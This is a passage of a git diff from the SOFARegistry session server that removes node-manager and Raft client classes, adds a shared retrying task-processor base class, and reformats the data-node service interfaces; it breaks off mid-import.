b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/NodeManager.java deleted file mode 100644 index 59b47879a..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/NodeManager.java +++ /dev/null @@ -1,48 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; - -import java.util.Collection; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author shangyu.wh - * @version $Id: NodeManager.java, v 0.1 2017-11-28 11:56 shangyu.wh Exp $ - */ -public interface NodeManager { - - Collection getDataCenterNodes(); - - T getNode(String dataInfoId); - - NodeType getNodeType(); - - void updateNodes(NodeChangeResult nodeChangeResult); - - Collection getDataCenters(); - - void reNewNode(); - - NodeChangeResult getAllDataCenterNodes(); - - ConcurrentHashMap getDataCenterNodesVersions(); -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/NodeManagerFactory.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/NodeManagerFactory.java deleted file mode 100644 index d2f9467dd..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/NodeManagerFactory.java +++ /dev/null @@ -1,47 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import org.springframework.beans.BeansException; -import org.springframework.context.ApplicationContext; -import org.springframework.context.ApplicationContextAware; - -import java.util.HashMap; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: StoreServiceFactory.java, v 0.1 2018-01-11 22:12 shangyu.wh Exp $ - */ -public class NodeManagerFactory implements ApplicationContextAware { - - private static Map nodeManagerMap = new HashMap<>(); - - public static NodeManager getNodeManager(NodeType nodeType) { - return nodeManagerMap.get(nodeType); - } - - @Override - public void setApplicationContext(ApplicationContext applicationContext) throws BeansException { - - Map map = applicationContext.getBeansOfType(NodeManager.class); - - map.forEach((key, value) -> nodeManagerMap.put(value.getNodeType(), value)); - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/RaftClientManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/RaftClientManager.java deleted file mode 100644 index 4eb4c370c..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/RaftClientManager.java +++ /dev/null @@ -1,144 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.server.session.bootstrap.CommonConfig; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Collection; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.atomic.AtomicBoolean; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: RaftClientManager.java, v 0.1 2018-06-20 20:50 shangyu.wh Exp $ - */ -public class RaftClientManager { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftClientManager.class); - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Autowired - private CommonConfig commonConfig; - - private RaftClient raftClient; - - private AtomicBoolean clientStart = new AtomicBoolean(false); - - private Set metaIps; - - public void startRaftClient() { - try { - if (clientStart.compareAndSet(false, true)) { - String serverConf = getServerConfig(); - raftClient = new RaftClient(getGroup(), serverConf); - raftClient.start(); - } - } catch (Exception e) { - clientStart.set(false); - LOGGER.error("Start raft client error!", e); - throw new RuntimeException("Start raft client error!", e); - } - } - - private String getServerConfig() { - String ret = ""; - Set ips = getMetaIp(); - if (ips != null && !ips.isEmpty()) { - ret = ips.stream().map(ip -> ip + ":" + ValueConstants.RAFT_SERVER_PORT).collect(Collectors.joining(",")); - } - if (ret.isEmpty()) { - throw new IllegalArgumentException("Init raft server config error!"); - } - return ret; - } - - public Set getMetaIp() { - if (metaIps != null && !metaIps.isEmpty()) { - return metaIps; - } - metaIps = new HashSet<>(); - Map> metaMap = commonConfig.getMetaNode(); - if (metaMap != null && !metaMap.isEmpty()) { - String localDataCenter = sessionServerConfig.getSessionServerDataCenter(); - if (localDataCenter != null && !localDataCenter.isEmpty()) { - Collection metas = metaMap.get(localDataCenter); - if (metas != null && !metas.isEmpty()) { - metas.forEach(domain -> { - String ip = NetUtil.getIPAddressFromDomain(domain); - if (ip == null) { - throw new RuntimeException("Node config convert domain {" + domain + "} error!"); - } - metaIps.add(ip); - }); - } - } - } - return metaIps; - } - - private String getGroup() { - return ValueConstants.RAFT_SERVER_GROUP + "_" - + sessionServerConfig.getSessionServerDataCenter(); - } - - public PeerId getLeader() { - if (raftClient == null) { - startRaftClient(); - } - PeerId leader = raftClient.getLeader(); - if (leader == null) { - LOGGER.error("[RaftClientManager] register MetaServer get no leader!"); - throw new RuntimeException("[RaftClientManager] register MetaServer get no leader!"); - } - return leader; - } - - public PeerId refreshLeader() { - if (raftClient == null) { - startRaftClient(); - } - PeerId leader = raftClient.refreshLeader(); - if (leader == null) { - LOGGER.error("[RaftClientManager] refresh MetaServer get no leader!"); - throw new RuntimeException("[RaftClientManager] refresh MetaServer get no leader!"); - } - return leader; - } - - /** - * Getter method for property clientStart. - * - * @return property value of clientStart - */ - public AtomicBoolean getClientStart() { - return clientStart; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/SessionNodeManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/SessionNodeManager.java deleted file mode 100644 index 4c50cfa2e..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/SessionNodeManager.java +++ /dev/null @@ -1,121 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.ReNewNodesRequest; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeManager.java, v 0.1 2018-03-05 10:42 shangyu.wh Exp $ - */ -public class SessionNodeManager extends AbstractNodeManager { - - private static final Logger LOGGER = LoggerFactory.getLogger(SessionNodeManager.class); - - @Override - public SessionNode getNode(String dataInfoId) { - return null; - } - - @Override - public NodeType getNodeType() { - return NodeType.SESSION; - } - - public List getZoneServerList(String zonename) { - List serverList = new ArrayList<>(); - Collection sessionNodes = getDataCenterNodes(); - if (sessionNodes != null && !sessionNodes.isEmpty()) { - if (zonename == null || zonename.isEmpty()) { - zonename = sessionServerConfig.getSessionServerRegion(); - } - for (SessionNode sessionNode : sessionNodes) { - if (zonename.equals(sessionNode.getRegionId())) { - URL url = sessionNode.getNodeUrl(); - if (url != null) { - serverList.add(url.getIpAddress()); - } - } - } - - } - return serverList; - } - - @Override - public void reNewNode() { - try { - - Request reNewNodesRequestRequest = new Request() { - - @Override - public ReNewNodesRequest getRequestBody() { - URL clientUrl = new URL(NetUtil.getLocalAddress().getHostAddress(), 0); - SessionNode sessionNode = new SessionNode(clientUrl, - sessionServerConfig.getSessionServerRegion()); - - return new ReNewNodesRequest(sessionNode); - } - - @Override - public URL getRequestUrl() { - return new URL(raftClientManager.getLeader().getIp(), - sessionServerConfig.getMetaServerPort()); - } - }; - - metaNodeExchanger.request(reNewNodesRequestRequest); - } catch (RequestException e) { - LOGGER.error("SessionNodeManager reNew node error! " + e.getRequestMessage(), e); - throw new RuntimeException("SessionNodeManager reNew node error! " - + e.getRequestMessage(), e); - } - } - - @Override - public void updateNodes(NodeChangeResult nodeChangeResult) { - write.lock(); - try { - Long receiveVersion = nodeChangeResult.getVersion(); - boolean versionChange = checkAndUpdateListVersions( - sessionServerConfig.getSessionServerDataCenter(), receiveVersion); - if (!versionChange) { - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("Current data type {} list version has not updated!", - getNodeType()); - } - } - nodes = nodeChangeResult.getNodes(); - } finally { - write.unlock(); - } - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/SessionProcessIdGenerator.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/SessionProcessIdGenerator.java deleted file mode 100644 index bec65516e..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/SessionProcessIdGenerator.java +++ /dev/null @@ -1,122 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.net.NetUtil; - -import java.util.concurrent.atomic.AtomicInteger; - -/** - * Session ProcessID Generator - * @author shangyu.wh - * @version $Id: SessionProcessId.java, v 0.1 2018-04-16 14:37 shangyu.wh Exp $ - */ -public class SessionProcessIdGenerator { - - private volatile static String processId; - - private final static String EMPTY_STRING = ""; - - private final static String PID = getPID(); - - private static AtomicInteger count = new AtomicInteger(1000); - - /** - * Get session processId. - */ - public static String getSessionProcessId() { - if (processId == null) { - synchronized (SessionProcessIdGenerator.class) { - if (processId == null) { - processId = generate(); - } - } - } - return processId; - } - - /** - * Generate session processId. - */ - public static String generate() { - String localIp = NetUtil.getLocalSocketAddress().getAddress().getHostAddress(); - if (localIp != null && !localIp.isEmpty()) { - return getId(getIPHex(localIp), System.currentTimeMillis(), getNextId()); - } - return EMPTY_STRING; - } - - private static String getId(String ip, long timestamp, int nextId) { - StringBuilder appender = new StringBuilder(30); - appender.append(ip).append(timestamp).append(nextId).append(PID); - return appender.toString(); - } - - private static String getIPHex(String ip) { - String[] ips = ip.split("\\."); - StringBuilder sb = new StringBuilder(); - for (String column : ips) { - String hex = Integer.toHexString(Integer.parseInt(column)); - if (hex.length() == 1) { - sb.append('0').append(hex); - } else { - sb.append(hex); - } - - } - return sb.toString(); - } - - /** - * Get process pid - */ - public static String getPID() { - String processName = java.lang.management.ManagementFactory.getRuntimeMXBean().getName(); - - if (isBlank(processName)) { - return EMPTY_STRING; - } - - String[] processSplitName = processName.split("@"); - - if (processSplitName.length == 0) { - return EMPTY_STRING; - } - - String pid = processSplitName[0]; - - if (isBlank(pid)) { - return EMPTY_STRING; - } - - return pid; - } - - private static int getNextId() { - for (;;) { - int current = count.get(); - int next = (current > 9000) ? 1000 : current + 1; - if (count.compareAndSet(current, next)) { - return next; - } - } - } - - private static boolean isBlank(String str) { - return str == null || str.isEmpty(); - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/AbstractRetrySingleTaskProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/AbstractRetrySingleTaskProcessor.java new file mode 100644 index 000000000..6c3ed5bdd --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/AbstractRetrySingleTaskProcessor.java @@ -0,0 +1,55 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.node.processor; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; +import com.alipay.sofa.registry.task.Retryable; +import com.alipay.sofa.registry.task.batcher.TaskProcessor; +import java.util.List; + +public abstract class AbstractRetrySingleTaskProcessor implements TaskProcessor { + private final Logger logger; + + protected AbstractRetrySingleTaskProcessor(Logger logger) { + this.logger = logger; + } + + @Override + public ProcessingResult process(SessionTask task) { + try { + logger.info("execute {}", task); + task.execute(); + logger.info("end {}", task); + return ProcessingResult.Success; + } catch (Throwable throwable) { + logger.error("SingleTask Process error! Task: {}", task, throwable); + if (task instanceof Retryable) { + Retryable retryAbleTask = (Retryable) task; + if (retryAbleTask.checkRetryTimes()) { + return ProcessingResult.TransientError; + } + } + return ProcessingResult.PermanentError; + } + } + + @Override + public ProcessingResult process(List tasks) { + return null; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ClientNodeSingleTaskProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ClientNodeSingleTaskProcessor.java index 0dcc28a69..203385a11 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ClientNodeSingleTaskProcessor.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ClientNodeSingleTaskProcessor.java @@ -20,32 +20,29 @@ import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; import com.alipay.sofa.registry.task.batcher.TaskProcessor; - import java.util.List; /** - * * @author shangyu.wh * @version $Id: ClientNodeSingleTaskProcessor.java, v 0.1 2017-12-11 19:47 shangyu.wh Exp $ */ public class ClientNodeSingleTaskProcessor implements TaskProcessor { - private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-PUSH", "[Task]"); + private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-PUSH", "[Task]"); - @Override - public ProcessingResult process(SessionTask task) { - try { - task.execute(); - return ProcessingResult.Success; - } catch (Throwable throwable) { - LOGGER.error("Client node SingleTask Process error! Task:" + task, throwable); - - return ProcessingResult.PermanentError; - } + @Override + public ProcessingResult process(SessionTask task) { + try { + task.execute(); + return ProcessingResult.Success; + } catch (Throwable throwable) { + LOGGER.error("Client node SingleTask Process error! Task: {}", task, throwable); + return ProcessingResult.PermanentError; } + } - @Override - public ProcessingResult process(List tasks) { - return null; - } -} \ No newline at end of file + @Override + public ProcessingResult process(List tasks) { + return null; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ConsoleSyncSingleTaskProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ConsoleSyncSingleTaskProcessor.java index 1273789d1..118536f56 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ConsoleSyncSingleTaskProcessor.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/ConsoleSyncSingleTaskProcessor.java @@ -18,43 +18,15 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.task.Retryable; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; - -import java.util.List; /** - * * @author zhuoyu.sjw * @version $Id: ConsoleSyncSingleTaskProcessor.java, v 0.1 2018-03-31 16:46 zhuoyu.sjw Exp $$ */ -public class ConsoleSyncSingleTaskProcessor implements TaskProcessor { - private static final Logger CONSOLE_LOGGER = LoggerFactory.getLogger("SESSION-CONSOLE", - "[Sync]"); - - @Override - public ProcessingResult process(SessionTask task) { - try { - CONSOLE_LOGGER.info("execute {}", task); - task.execute(); - CONSOLE_LOGGER.info("end {}", task); - return ProcessingResult.Success; - } catch (Throwable throwable) { - CONSOLE_LOGGER.error("Sync to console SingleTask Process error! Task:" + task, - throwable); - if (task instanceof Retryable) { - Retryable retryAbleTask = (Retryable) task; - if (retryAbleTask.checkRetryTimes()) { - return ProcessingResult.TransientError; - } - } - return ProcessingResult.PermanentError; - } - } +public class ConsoleSyncSingleTaskProcessor extends AbstractRetrySingleTaskProcessor { + private static final Logger CONSOLE_LOGGER = LoggerFactory.getLogger("SESSION-CONSOLE", "[Sync]"); - @Override - public ProcessingResult process(List tasks) { - return null; - } + public ConsoleSyncSingleTaskProcessor() { + super(CONSOLE_LOGGER); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/DataNodeSingleTaskProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/DataNodeSingleTaskProcessor.java deleted file mode 100644 index 74d6c9c43..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/DataNodeSingleTaskProcessor.java +++ /dev/null @@ -1,60 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node.processor; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.task.Retryable; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; - -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeSingleTaskProcessor.java, v 0.1 2017-12-11 19:35 shangyu.wh Exp $ - */ -public class DataNodeSingleTaskProcessor implements TaskProcessor { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeSingleTaskProcessor.class, - "[Task]"); - - @Override - public ProcessingResult process(SessionTask task) { - try { - LOGGER.info("execute " + task); - task.execute(); - LOGGER.info("end " + task); - return ProcessingResult.Success; - } catch (Throwable throwable) { - LOGGER.error("Data node SingleTask Process error! Task:" + task, throwable); - if (task instanceof Retryable) { - Retryable retryAbleTask = (Retryable) task; - if (retryAbleTask.checkRetryTimes()) { - return ProcessingResult.TransientError; - } - } - return ProcessingResult.PermanentError; - } - } - - @Override - public ProcessingResult process(List tasks) { - return null; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/MetaNodeSingleTaskProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/MetaNodeSingleTaskProcessor.java index 927cc5ea2..b55cf91b0 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/MetaNodeSingleTaskProcessor.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/processor/MetaNodeSingleTaskProcessor.java @@ -18,43 +18,17 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.task.Retryable; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; - -import java.util.List; /** - * * @author shangyu.wh * @version $Id: DataNodeSingleTaskProcessor.java, v 0.1 2017-12-11 19:35 shangyu.wh Exp $ */ -public class MetaNodeSingleTaskProcessor implements TaskProcessor { - - private static final Logger LOGGER = LoggerFactory.getLogger(MetaNodeSingleTaskProcessor.class, - "[Task]"); +public class MetaNodeSingleTaskProcessor extends AbstractRetrySingleTaskProcessor { - @Override - public ProcessingResult process(SessionTask task) { - try { - LOGGER.info("execute " + task); - task.execute(); - LOGGER.info("end " + task); - return ProcessingResult.Success; - } catch (Throwable throwable) { - LOGGER.error("Meta node SingleTask Process error! Task:" + task, throwable); - if (task instanceof Retryable) { - Retryable retryAbleTask = (Retryable) task; - if (retryAbleTask.checkRetryTimes()) { - return ProcessingResult.TransientError; - } - } - return ProcessingResult.PermanentError; - } - } + private static final Logger LOGGER = + LoggerFactory.getLogger(MetaNodeSingleTaskProcessor.class, "[Task]"); - @Override - public ProcessingResult process(List tasks) { - return null; - } -} \ No newline at end of file + public MetaNodeSingleTaskProcessor() { + super(LOGGER); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeService.java index 30ce420d3..ee3976a39 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeService.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeService.java @@ -20,11 +20,10 @@ import com.alipay.sofa.registry.remoting.CallbackHandler; /** - * * @author shangyu.wh * @version $Id: ClientNodeService.java, v 0.1 2017-12-01 11:16 shangyu.wh Exp $ */ public interface ClientNodeService { - void pushWithCallback(Object object, URL url, CallbackHandler callbackHandler); -} \ No newline at end of file + void pushWithCallback(Object object, URL url, CallbackHandler callbackHandler); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeServiceImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeServiceImpl.java index 7ab6333cf..9345dae29 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeServiceImpl.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/ClientNodeServiceImpl.java @@ -19,46 +19,35 @@ import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.remoting.CallbackHandler; import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; import com.alipay.sofa.registry.remoting.exchange.message.Request; import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: ClientNode.java, v 0.1 2017-12-12 11:56 shangyu.wh Exp $ */ public class ClientNodeServiceImpl implements ClientNodeService { - @Autowired - private NodeExchanger clientNodeExchanger; - - @Override - public void pushWithCallback(Object object, URL url, CallbackHandler callbackHandler) { - - try { - Request request = new Request() { - - @Override - public Object getRequestBody() { - return object; - } - - @Override - public URL getRequestUrl() { - return url; - } - - @Override - public CallbackHandler getCallBackHandler() { - return callbackHandler; - } - }; - - clientNodeExchanger.request(request); - - } catch (RequestException e) { - throw new RuntimeException("Push data to client node error !" + e.getRequestMessage(), - e); - } - } -} \ No newline at end of file + @Autowired private NodeExchanger clientNodeExchanger; + + @Override + public void pushWithCallback(Object object, URL url, CallbackHandler callbackHandler) { + Request request = + new Request() { + @Override + public Object getRequestBody() { + return object; + } + + @Override + public URL getRequestUrl() { + return url; + } + + @Override + public CallbackHandler getCallBackHandler() { + return callbackHandler; + } + }; + clientNodeExchanger.request(request); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeService.java index df1180ba8..61f3bc65f 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeService.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeService.java @@ -16,85 +16,55 @@ */ package com.alipay.sofa.registry.server.session.node.service; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.SessionServerRegisterRequest; +import com.alipay.sofa.registry.common.model.ClientOffPublishers; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.common.model.store.URL; - -import java.util.Collection; -import java.util.List; +import com.alipay.sofa.registry.common.model.store.SubDatum; import java.util.Map; /** - * * @author shangyu.wh * @version $Id: NodeService.java, v 0.1 2017-11-28 11:09 shangyu.wh Exp $ */ public interface DataNodeService { - /** - * new publisher data transform to data server - * - * @param publisher - */ - void register(Publisher publisher); - - /** - * remove publisher data from data server - * - * @param publisher - */ - void unregister(Publisher publisher); - - /** - * session server support api to stop some client node,all register data on data server will be removed - * data on session server will be remove too - * - * @param connectIds - */ - void clientOff(List connectIds); - - /** - * Get some dataInfoId version from one data server - * - * @param dataNodeUrl - * @param dataInfoIdList - * @return - */ - Map> fetchDataVersion(URL dataNodeUrl, - Collection dataInfoIdList); - - /** - * fetch one dataCenter publisher data from data server - * - * @param dataInfoId - * @param dataCenterId - * @return - */ - Datum fetchDataCenter(String dataInfoId, String dataCenterId); + /** + * new publisher data transform to data server + * + * @param publisher + */ + void register(Publisher publisher); - /** - * fetch all dataCenter datum - * @param dataInfoId - * @return - */ - Map fetchGlobal(String dataInfoId); + /** + * remove publisher data from data server + * + * @param publisher + */ + void unregister(Publisher publisher); - /** - * fetch datum by specify dataCenter and dataInfoId - * @param dataInfoId - * @param dataCenterId - * @return - */ - Map getDatumMap(String dataInfoId, String dataCenterId); + /** + * session server support api to stop some client node,all register data on data server will be + * removed data on session server will be remove too + * + * @param clientOffPublishers + */ + void clientOff(ClientOffPublishers clientOffPublishers); - /** - * register session process id when connect to data node - * process id see SessionProcessIdGenerator - * @param sessionServerRegisterRequest - * @param dataUrl - */ - void registerSessionProcessId(SessionServerRegisterRequest sessionServerRegisterRequest, - URL dataUrl); + /** + * Get some dataInfoId version from one data server + * + * @param slotId + * @return + */ + Map fetchDataVersion( + String dataCenter, int slotId, Map interests); -} \ No newline at end of file + /** + * fetch one dataCenter publisher data from data server + * + * @param dataInfoId + * @param dataCenterId + * @return + */ + SubDatum fetch(String dataInfoId, String dataCenterId); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeServiceImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeServiceImpl.java index 4337f2432..77cf38d0e 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeServiceImpl.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/DataNodeServiceImpl.java @@ -16,18 +16,15 @@ */ package com.alipay.sofa.registry.server.session.node.service; +import com.alipay.sofa.registry.common.model.ClientOffPublishers; import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.ClientOffRequest; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.GetDataRequest; -import com.alipay.sofa.registry.common.model.dataserver.GetDataVersionRequest; -import com.alipay.sofa.registry.common.model.dataserver.PublishDataRequest; -import com.alipay.sofa.registry.common.model.dataserver.SessionServerRegisterRequest; -import com.alipay.sofa.registry.common.model.dataserver.UnPublishDataRequest; +import 